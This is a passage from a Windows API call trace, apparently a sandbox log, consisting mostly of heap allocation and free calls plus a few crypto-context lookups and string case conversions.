hHeap=0x25c0000) returned 1 [0190.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0190.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0190.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0190.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0190.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0190.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0190.817] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0190.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0190.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0190.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0190.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0190.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0190.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0190.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0190.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0190.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0190.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0190.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0190.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0190.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0190.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0190.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0190.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0190.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0190.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0190.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0190.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0190.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0190.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0190.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0190.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0190.818] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0190.818] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466df0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0190.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0190.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0190.818] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0190.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0190.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0190.818] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0190.819] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466df0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0190.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0190.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0190.819] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0190.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0190.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0190.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b36c0 | out: hHeap=0x25c0000) returned 1 [0190.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0190.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0190.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0190.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0190.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0190.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0190.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0190.824] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xaa3868) returned 1 [0190.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0190.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0190.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0190.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0190.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0190.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0190.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0190.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0190.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0190.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0190.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0190.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0190.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0190.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0190.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0190.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0190.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0190.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0190.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0190.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0190.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0190.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0190.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0190.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0190.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0190.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0190.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0190.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0190.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0190.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0190.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0190.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0190.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0190.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0190.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0190.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0190.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0190.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0190.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0190.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0190.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0190.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0190.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0190.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0190.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0190.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0190.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0190.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0190.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0190.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0190.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0190.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0190.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0190.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0190.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0190.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0190.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0190.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0190.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0190.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0190.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0190.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0190.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0190.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0190.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0190.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0190.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0190.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0190.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0190.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0190.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0190.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0190.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0190.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0190.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0190.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0190.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0190.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0190.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416490 [0190.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0190.829] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0190.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0190.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0190.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0190.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0190.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0190.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0190.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0190.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0190.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0190.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0190.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0190.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0190.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0190.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0190.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0190.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0190.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0190.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0190.830] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0190.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0190.830] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0190.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0190.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0190.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0190.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b16c8 [0190.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0190.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0190.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0190.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0190.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0190.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0190.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0190.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0190.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0190.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0190.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0190.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0190.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0190.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0190.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9fd8 [0190.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0190.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0190.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0190.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0190.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0190.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0190.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0190.831] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0190.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0190.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0190.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0190.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0190.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0190.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0190.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0190.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0190.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0190.832] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0190.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0190.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0190.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0190.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0190.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0190.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0190.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0190.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0190.832] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0190.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0190.832] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0190.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0190.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0190.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0190.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0190.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0190.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0190.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0190.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0190.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0190.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0190.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0190.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0190.833] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0190.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0190.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0190.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: 